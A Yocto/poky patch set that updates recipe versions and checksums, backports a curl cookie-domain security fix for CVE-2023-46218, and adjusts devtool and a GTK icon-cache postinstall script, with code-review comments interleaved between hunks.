+SRCREV_machine:class-devupstream ?= "4631960b4700dd53f5cebb4f7055fd00ccd556ce"
PN:class-devupstream = "linux-yocto-upstream"
KBRANCH:class-devupstream = "v6.5/base"
@@ -44,7 +44,7 @@ SRC_URI = "git://git.yoctoproject.org/linux-yocto.git;name=machine;branch=${KBRA
git://git.yoctoproject.org/yocto-kernel-cache;type=kmeta;name=meta;branch=yocto-6.5;destsuffix=${KMETA};protocol=https"
LIC_FILES_CHKSUM = "file://COPYING;md5=6bc538ed5bd9a7fc9398086aedcd7e46"
-LINUX_VERSION ?= "6.5.7"
+LINUX_VERSION ?= "6.5.13"
PV = "${LINUX_VERSION}+git"
diff --git a/poky/meta/recipes-kernel/perf/perf.bb b/poky/meta/recipes-kernel/perf/perf.bb
index 675acfaf26..a392166e73 100644
--- a/poky/meta/recipes-kernel/perf/perf.bb
+++ b/poky/meta/recipes-kernel/perf/perf.bb
@@ -73,6 +73,15 @@ SPDX_S = "${S}/tools/perf"
# supported kernel.
LDFLAGS="-ldl -lutil"
+# Perf's build system adds its own optimization flags for most TUs,
+# overriding the flags included here. But for some, perf does not add
+# any -O option, so ensure the distro's chosen optimization gets used
+# for those. Since ${SELECTED_OPTIMIZATION} always includes
+# ${DEBUG_FLAGS} which in turn includes ${DEBUG_PREFIX_MAP}, this also
+# ensures perf is built with appropriate -f*-prefix-map options,
+# avoiding the 'buildpaths' QA warning.
+TARGET_CC_ARCH += "${SELECTED_OPTIMIZATION}"
+
EXTRA_OEMAKE = '\
V=1 \
VF=1 \
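Review bot: the new comment makes the `buildpaths` fix depend on `${SELECTED_OPTIMIZATION}` always including `${DEBUG_FLAGS}`, and through it `${DEBUG_PREFIX_MAP}`. That is a default set outside this recipe; a distro or local.conf that redefines the optimization variables without `${DEBUG_FLAGS}` would lose the prefix-map options here and the QA warning would come back. If the reproducibility part is the goal, consider adding `${DEBUG_PREFIX_MAP}` to `TARGET_CC_ARCH` explicitly, or note in the comment that the recipe relies on that default.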
diff --git a/poky/meta/recipes-multimedia/gstreamer/gst-devtools_1.22.6.bb b/poky/meta/recipes-multimedia/gstreamer/gst-devtools_1.22.7.bb
index 90bbd9c733..b545f020cf 100644
--- a/poky/meta/recipes-multimedia/gstreamer/gst-devtools_1.22.6.bb
+++ b/poky/meta/recipes-multimedia/gstreamer/gst-devtools_1.22.7.bb
@@ -12,7 +12,7 @@ SRC_URI = "https://gstreamer.freedesktop.org/src/gst-devtools/gst-devtools-${PV}
file://0001-connect-has-a-different-signature-on-musl.patch \
"
-SRC_URI[sha256sum] = "8928560efaf16137c30285e718708e5d0bab0777eb4ef8127e0274e120d3d86b"
+SRC_URI[sha256sum] = "157cf93fb2741cf0c3dea731be3af2ffae703c9f2cd3c0c91b380fbc685eb9f9"
DEPENDS = "json-glib glib-2.0 glib-2.0-native gstreamer1.0 gstreamer1.0-plugins-base"
RRECOMMENDS:${PN} = "git"
diff --git a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-libav_1.22.6.bb b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-libav_1.22.7.bb
index 8906556b44..7169223636 100644
--- a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-libav_1.22.6.bb
+++ b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-libav_1.22.7.bb
@@ -12,7 +12,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=69333daa044cb77e486cc36129f7a770 \
"
SRC_URI = "https://gstreamer.freedesktop.org/src/gst-libav/gst-libav-${PV}.tar.xz"
-SRC_URI[sha256sum] = "7789e6408388a25f23cbf948cfc5c6230d735bbcd8b7f37f4a01c9e348a1e3a7"
+SRC_URI[sha256sum] = "1525b917141b895fe5cf618fe8867622b2528278a0286e9f727b5f37317daca1"
S = "${WORKDIR}/gst-libav-${PV}"
diff --git a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-omx_1.22.6.bb b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-omx_1.22.7.bb
index 2579aa3d66..ad40cf5513 100644
--- a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-omx_1.22.6.bb
+++ b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-omx_1.22.7.bb
@@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c \
SRC_URI = "https://gstreamer.freedesktop.org/src/gst-omx/gst-omx-${PV}.tar.xz"
-SRC_URI[sha256sum] = "223833c42518ad7eb1923bb4dd3726809f59a66d6e9aaaa69cb29ad0750c8758"
+SRC_URI[sha256sum] = "d7a18ec47d40a472bd5cba2015e0be72b732f1699895398cec5cd8e6a3a53b44"
S = "${WORKDIR}/gst-omx-${PV}"
diff --git a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-bad_1.22.6.bb b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-bad_1.22.7.bb
index 3db7ddff5f..b7d787b611 100644
--- a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-bad_1.22.6.bb
+++ b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-bad_1.22.7.bb
@@ -10,7 +10,7 @@ SRC_URI = "https://gstreamer.freedesktop.org/src/gst-plugins-bad/gst-plugins-bad
file://0002-avoid-including-sys-poll.h-directly.patch \
file://0004-opencv-resolve-missing-opencv-data-dir-in-yocto-buil.patch \
"
-SRC_URI[sha256sum] = "b4029cd2908a089c55f1d902a565d007495c95b1442d838485dc47fb12df7137"
+SRC_URI[sha256sum] = "c716f8dffa8fac3fb646941af1c6ec72fff05a045131311bf2d049fdc87bce2e"
S = "${WORKDIR}/gst-plugins-bad-${PV}"
diff --git a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base_1.22.6.bb b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base_1.22.7.bb
index 1f67ca303a..3b8923e8f2 100644
--- a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base_1.22.6.bb
+++ b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base_1.22.7.bb
@@ -11,7 +11,7 @@ SRC_URI = "https://gstreamer.freedesktop.org/src/gst-plugins-base/gst-plugins-ba
file://0003-viv-fb-Make-sure-config.h-is-included.patch \
file://0002-ssaparse-enhance-SSA-text-lines-parsing.patch \
"
-SRC_URI[sha256sum] = "50f2b4d17c02eefe430bbefa8c5cd134b1be78a53c0f60e951136d96cf49fd4b"
+SRC_URI[sha256sum] = "62519e0d8f969ebf62a9a7996f2d23efdda330217a635f4a32c0bf1c71577468"
S = "${WORKDIR}/gst-plugins-base-${PV}"
diff --git a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good_1.22.6.bb b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good_1.22.7.bb
index 6b76ba957e..b8496a1750 100644
--- a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good_1.22.6.bb
+++ b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good_1.22.7.bb
@@ -8,7 +8,7 @@ SRC_URI = "https://gstreamer.freedesktop.org/src/gst-plugins-good/gst-plugins-go
file://0001-qt-include-ext-qt-gstqtgl.h-instead-of-gst-gl-gstglf.patch \
file://0001-v4l2-Define-ioctl_req_t-for-posix-linux-case.patch"
-SRC_URI[sha256sum] = "b3b07fe3f1ce7fe93aa9be7217866044548f35c4a7792280eec7e108a32f9817"
+SRC_URI[sha256sum] = "b6db0e18e398b52665b7cdce301c34a8750483d5f4fbac1ede9f80b03743cd15"
S = "${WORKDIR}/gst-plugins-good-${PV}"
diff --git a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-ugly_1.22.6.bb b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-ugly_1.22.7.bb
index 77f79a630a..8a67531123 100644
--- a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-ugly_1.22.6.bb
+++ b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-ugly_1.22.7.bb
@@ -14,7 +14,7 @@ LICENSE_FLAGS = "commercial"
SRC_URI = " \
https://gstreamer.freedesktop.org/src/gst-plugins-ugly/gst-plugins-ugly-${PV}.tar.xz \
"
-SRC_URI[sha256sum] = "3e31454c98cb2f7f6d2d355eceb933a892fa0f1dc09bc36c9abc930d8e29ca48"
+SRC_URI[sha256sum] = "520b46bca637189ad86a298ff245b2d89375dbcac8b05d74daea910f81a9e9da"
S = "${WORKDIR}/gst-plugins-ugly-${PV}"
diff --git a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-python_1.22.6.bb b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-python_1.22.7.bb
index addf12c427..a387031635 100644
--- a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-python_1.22.6.bb
+++ b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-python_1.22.7.bb
@@ -8,7 +8,7 @@ LICENSE = "LGPL-2.1-or-later"
LIC_FILES_CHKSUM = "file://COPYING;md5=c34deae4e395ca07e725ab0076a5f740"
SRC_URI = "https://gstreamer.freedesktop.org/src/${PNREAL}/${PNREAL}-${PV}.tar.xz"
-SRC_URI[sha256sum] = "51de2d6d13b12ce095eac97c0b94ee59c2aeba3712bb7462b78c4d57dde176c5"
+SRC_URI[sha256sum] = "1ef8df7608012fa469329799c950ec087737a6dabad3003c230658b58c710172"
DEPENDS = "gstreamer1.0 gstreamer1.0-plugins-base python3-pygobject"
RDEPENDS:${PN} += "gstreamer1.0 gstreamer1.0-plugins-base python3-pygobject"
diff --git a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-rtsp-server_1.22.6.bb b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-rtsp-server_1.22.7.bb
index fd79fe4324..af1c2ced44 100644
--- a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-rtsp-server_1.22.6.bb
+++ b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-rtsp-server_1.22.7.bb
@@ -10,7 +10,7 @@ PNREAL = "gst-rtsp-server"
SRC_URI = "https://gstreamer.freedesktop.org/src/${PNREAL}/${PNREAL}-${PV}.tar.xz"
-SRC_URI[sha256sum] = "0ae33a8b50443b62f11581a9181e906b41cd3877b2d799dbea72912c3eda4bb3"
+SRC_URI[sha256sum] = "f7fac001e20ad21e36d18397741c4657c5d43571eb1cc3b49f9a93ae127dc88f"
S = "${WORKDIR}/${PNREAL}-${PV}"
diff --git a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-vaapi_1.22.6.bb b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-vaapi_1.22.7.bb
index bf4c105057..4cad50742d 100644
--- a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-vaapi_1.22.6.bb
+++ b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-vaapi_1.22.7.bb
@@ -11,7 +11,7 @@ LIC_FILES_CHKSUM = "file://COPYING.LIB;md5=4fbd65380cdd255951079008b364516c"
SRC_URI = "https://gstreamer.freedesktop.org/src/${REALPN}/${REALPN}-${PV}.tar.xz"
-SRC_URI[sha256sum] = "d9ba2fc26bef98c78e982c599f585d46bbb65fe122da89c2d7ab41f468a52c7b"
+SRC_URI[sha256sum] = "0e9fff768b89de6d318b34146e4e781d82b9a0f4025dc541b2c8349c7bcb7f67"
S = "${WORKDIR}/${REALPN}-${PV}"
DEPENDS = "libva gstreamer1.0 gstreamer1.0-plugins-base gstreamer1.0-plugins-bad"
diff --git a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0_1.22.6.bb b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0_1.22.7.bb
index a898464322..72161b272f 100644
--- a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0_1.22.6.bb
+++ b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0_1.22.7.bb
@@ -22,7 +22,7 @@ SRC_URI = "https://gstreamer.freedesktop.org/src/gstreamer/gstreamer-${PV}.tar.x
file://0003-tests-use-a-dictionaries-for-environment.patch;striplevel=3 \
file://0004-tests-add-helper-script-to-run-the-installed_tests.patch;striplevel=3 \
"
-SRC_URI[sha256sum] = "f500e6cfddff55908f937711fc26a0840de28a1e9ec49621c0b6f1adbd8f818e"
+SRC_URI[sha256sum] = "01e42c6352a06bdfa4456e64b06ab7d98c5c487a25557c761554631cbda64217"
PACKAGECONFIG ??= "${@bb.utils.contains('PTEST_ENABLED', '1', 'tests', '', d)} \
check \
diff --git a/poky/meta/recipes-support/curl/curl/CVE-2023-46218.patch b/poky/meta/recipes-support/curl/curl/CVE-2023-46218.patch
new file mode 100644
index 0000000000..de2f095664
--- /dev/null
+++ b/poky/meta/recipes-support/curl/curl/CVE-2023-46218.patch
@@ -0,0 +1,52 @@
+CVE: CVE-2023-46218
+Upstream-Status: Backport [ https://github.com/curl/curl/commit/2b0994c29a721c91c57 ]
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+From 2b0994c29a721c91c572cff7808c572a24d251eb Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Thu, 23 Nov 2023 08:15:47 +0100
+Subject: [PATCH] cookie: lowercase the domain names before PSL checks
+
+Reported-by: Harry Sintonen
+
+Closes #12387
+---
+ lib/cookie.c | 24 ++++++++++++++++--------
+ 1 file changed, 16 insertions(+), 8 deletions(-)
+
+diff --git a/lib/cookie.c b/lib/cookie.c
+index 568cf537ad1b1f..9095cea3e97f22 100644
+--- a/lib/cookie.c
++++ b/lib/cookie.c
+@@ -1027,15 +1027,23 @@ Curl_cookie_add(struct Curl_easy *data,
+ * dereference it.
+ */
+ if(data && (domain && co->domain && !Curl_host_is_ipnum(co->domain))) {
+- const psl_ctx_t *psl = Curl_psl_use(data);
+- int acceptable;
+-
+- if(psl) {
+- acceptable = psl_is_cookie_domain_acceptable(psl, domain, co->domain);
+- Curl_psl_release(data);
++ bool acceptable = FALSE;
++ char lcase[256];
++ char lcookie[256];
++ size_t dlen = strlen(domain);
++ size_t clen = strlen(co->domain);
++ if((dlen < sizeof(lcase)) && (clen < sizeof(lcookie))) {
++ const psl_ctx_t *psl = Curl_psl_use(data);
++ if(psl) {
++ /* the PSL check requires lowercase domain name and pattern */
++ Curl_strntolower(lcase, domain, dlen + 1);
++ Curl_strntolower(lcookie, co->domain, clen + 1);
++ acceptable = psl_is_cookie_domain_acceptable(psl, lcase, lcookie);
++ Curl_psl_release(data);
++ }
++ else
++ acceptable = !bad_domain(domain, strlen(domain));
+ }
+- else
+- acceptable = !bad_domain(domain, strlen(domain));
+
+ if(!acceptable) {
+ infof(data, "cookie '%s' dropped, domain '%s' must not "
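Review bot: in the fallback `else` of the rewritten block in lib/cookie.c, `bad_domain(domain, strlen(domain))` recomputes a length that is already held in `dlen`; passing `dlen` would avoid the second scan. The guard `(dlen < sizeof(lcase)) && (clen < sizeof(lcookie))` now also wraps that fallback, so a domain of 256 bytes or more leaves `acceptable` at FALSE and the cookie is dropped even when no PSL context is available. That fail-closed behaviour is reasonable but deserves a short comment next to the guard, since the only comment in the hunk is about lowercasing. In the patch header, the Upstream-Status URL carries a shortened commit hash while the From line below it has the full one; using the full hash in the URL makes the backport easier to trace.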
diff --git a/poky/meta/recipes-support/curl/curl_8.4.0.bb b/poky/meta/recipes-support/curl/curl_8.4.0.bb
index 5f97730bf4..8f1ba52692 100644
--- a/poky/meta/recipes-support/curl/curl_8.4.0.bb
+++ b/poky/meta/recipes-support/curl/curl_8.4.0.bb
@@ -13,6 +13,7 @@ SRC_URI = " \
https://curl.se/download/${BP}.tar.xz \
file://run-ptest \
file://disable-tests \
+ file://CVE-2023-46218.patch \
"
SRC_URI[sha256sum] = "16c62a9c4af0f703d28bda6d7bbf37ba47055ad3414d70dec63e2e6336f2a82d"
diff --git a/poky/meta/recipes-support/enchant/enchant2_2.6.1.bb b/poky/meta/recipes-support/enchant/enchant2_2.6.2.bb
index a3510a8705..38d3245d20 100644
--- a/poky/meta/recipes-support/enchant/enchant2_2.6.1.bb
+++ b/poky/meta/recipes-support/enchant/enchant2_2.6.2.bb
@@ -12,7 +12,7 @@ DEPENDS = "glib-2.0 groff-native"
inherit autotools pkgconfig github-releases
SRC_URI = "${GITHUB_BASE_URI}/download/v${PV}/enchant-${PV}.tar.gz"
-SRC_URI[sha256sum] = "f24e12469137ae1d03140bb9032a47a5947c36f4d1e2f12b929061005eb15279"
+SRC_URI[sha256sum] = "6686a728e56e760f8dee09a22f0fb53b46ee9dbe7d64cf9e5bb35a658bff7e1d"
GITHUB_BASE_URI = "https://github.com/AbiWord/enchant/releases"
diff --git a/poky/meta/recipes-support/libgcrypt/libgcrypt_1.10.2.bb b/poky/meta/recipes-support/libgcrypt/libgcrypt_1.10.3.bb
index 524b06ca22..1c4f4d6038 100644
--- a/poky/meta/recipes-support/libgcrypt/libgcrypt_1.10.2.bb
+++ b/poky/meta/recipes-support/libgcrypt/libgcrypt_1.10.3.bb
@@ -27,7 +27,7 @@ SRC_URI = "${GNUPG_MIRROR}/libgcrypt/libgcrypt-${PV}.tar.bz2 \
file://no-bench-slope.patch \
file://run-ptest \
"
-SRC_URI[sha256sum] = "3b9c02a004b68c256add99701de00b383accccf37177e0d6c58289664cce0c03"
+SRC_URI[sha256sum] = "8b0870897ac5ac67ded568dcfadf45969cfa8a6beb0fd60af2a9eadc2a3272aa"
CVE_STATUS[CVE-2018-12433] = "disputed: CVE is disputed and not affecting crypto libraries for any distro."
CVE_STATUS[CVE-2018-12438] = "disputed: CVE is disputed and not affecting crypto libraries for any distro."
diff --git a/poky/meta/recipes-support/libxslt/libxslt_1.1.38.bb b/poky/meta/recipes-support/libxslt/libxslt_1.1.39.bb
index ed5b15badd..2cc0c84bec 100644
--- a/poky/meta/recipes-support/libxslt/libxslt_1.1.38.bb
+++ b/poky/meta/recipes-support/libxslt/libxslt_1.1.39.bb
@@ -15,7 +15,7 @@ DEPENDS = "libxml2"
SRC_URI = "https://download.gnome.org/sources/libxslt/1.1/libxslt-${PV}.tar.xz"
-SRC_URI[sha256sum] = "1f32450425819a09acaff2ab7a5a7f8a2ec7956e505d7beeb45e843d0e1ecab1"
+SRC_URI[sha256sum] = "2a20ad621148339b0759c4d4e96719362dee64c9a096dbba625ba053846349f0"
UPSTREAM_CHECK_REGEX = "libxslt-(?P<pver>\d+(\.\d+)+)\.tar"
diff --git a/poky/meta/recipes-support/vim/vim.inc b/poky/meta/recipes-support/vim/vim.inc
index a37310afd8..6b440d8947 100644
--- a/poky/meta/recipes-support/vim/vim.inc
+++ b/poky/meta/recipes-support/vim/vim.inc
@@ -19,8 +19,8 @@ SRC_URI = "git://github.com/vim/vim.git;branch=master;protocol=https \
file://no-path-adjust.patch \
"
-PV .= ".2068"
-SRCREV = "9198c1f2b1ddecde22af918541e0de2a32f0f45a"
+PV .= ".2130"
+SRCREV = "075ad7047457debfeef13442c01e74088b461092"
# Do not consider .z in x.y.z, as that is updated with every commit
UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+\.\d+)\.0"
diff --git a/poky/scripts/lib/devtool/standard.py b/poky/scripts/lib/devtool/standard.py
index d53fb81007..55fa38ccfb 100644
--- a/poky/scripts/lib/devtool/standard.py
+++ b/poky/scripts/lib/devtool/standard.py
@@ -1530,6 +1530,11 @@ def _update_recipe_srcrev(recipename, workspace, srctree, rd, appendlayerdir, wi
recipedir = os.path.basename(recipefile)
logger.info('Updating SRCREV in recipe %s%s' % (recipedir, dry_run_suffix))
+ # Get original SRCREV
+ old_srcrev = rd.getVar('SRCREV') or ''
+ if old_srcrev == "INVALID":
+ raise DevtoolError('Update mode srcrev is only valid for recipe fetched from an SCM repository')
+
# Get HEAD revision
try:
stdout, _ = bb.process.run('git rev-parse HEAD', cwd=srctree)
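Review bot: the new `INVALID` check sits after the `logger.info('Updating SRCREV in recipe ...')` call, so the user is told the recipe is being updated immediately before the DevtoolError is raised; moving the check above the log line would avoid the misleading message. The error text would read better as "only valid for recipes fetched from an SCM repository". The `or ''` fallback also means an unset SRCREV passes this check as an empty string and is handed on to `_export_patches`, so it is worth confirming that case is intended.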
@@ -1556,7 +1561,6 @@ def _update_recipe_srcrev(recipename, workspace, srctree, rd, appendlayerdir, wi
if not no_remove:
# Find list of existing patches in recipe file
patches_dir = tempfile.mkdtemp(dir=tempdir)
- old_srcrev = rd.getVar('SRCREV') or ''
upd_p, new_p, del_p = _export_patches(srctree, rd, old_srcrev,
patches_dir)
logger.debug('Patches: update %s, new %s, delete %s' % (dict(upd_p), dict(new_p), dict(del_p)))
@@ -1576,11 +1580,10 @@ def _update_recipe_srcrev(recipename, workspace, srctree, rd, appendlayerdir, wi
patchfields['SRC_URI'] = '\\\n '.join(srcuri)
if dry_run_outdir:
logger.info('Creating bbappend (dry-run)')
- else:
- appendfile, destpath = oe.recipeutils.bbappend_recipe(
- rd, appendlayerdir, files, wildcardver=wildcard_version,
- extralines=patchfields, removevalues=removevalues,
- redirect_output=dry_run_outdir)
+ appendfile, destpath = oe.recipeutils.bbappend_recipe(
+ rd, appendlayerdir, files, wildcardver=wildcard_version,
+ extralines=patchfields, removevalues=removevalues,
+ redirect_output=dry_run_outdir)
else:
files_dir = _determine_files_dir(rd)
for basepath, path in upd_f.items():
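Review bot: with the `else:` removed, `oe.recipeutils.bbappend_recipe(...)` now runs in dry-run mode too, and the only thing keeping a dry run from writing into `appendlayerdir` is the `redirect_output=dry_run_outdir` argument. A one-line comment above the call stating that the dry-run path relies on `redirect_output` would make the intent explicit, and a test asserting that a dry run leaves the layer unchanged would guard against regressions.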
diff --git a/poky/scripts/postinst-intercepts/update_gtk_icon_cache b/poky/scripts/postinst-intercepts/update_gtk_icon_cache
index 99367a2855..a92bd840c6 100644
--- a/poky/scripts/postinst-intercepts/update_gtk_icon_cache
+++ b/poky/scripts/postinst-intercepts/update_gtk_icon_cache
@@ -11,7 +11,11 @@ $STAGING_DIR_NATIVE/${libdir_native}/gdk-pixbuf-2.0/gdk-pixbuf-query-loaders --u
for icondir in $D/usr/share/icons/*/ ; do
if [ -d $icondir ] ; then
- gtk-update-icon-cache -fqt $icondir
+ for gtkuic_cmd in gtk-update-icon-cache gtk4-update-icon-cache ; do
+ if [ -n "$(which $gtkuic_cmd)" ]; then
+ $gtkuic_cmd -fqt $icondir
+ fi
+ done
fi
done
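Review bot: the `if [ -n "$(which $gtkuic_cmd)" ]` test depends on `which`, which is not guaranteed to exist on the build host and can print to stderr when the command is missing; `command -v $gtkuic_cmd >/dev/null 2>&1` is the portable form. When neither gtk-update-icon-cache nor gtk4-update-icon-cache is found, the loop now does nothing and reports no error, where the old line would have failed, so a warning for that case would help. `$icondir` should also be quoted in the new `$gtkuic_cmd -fqt $icondir` invocation.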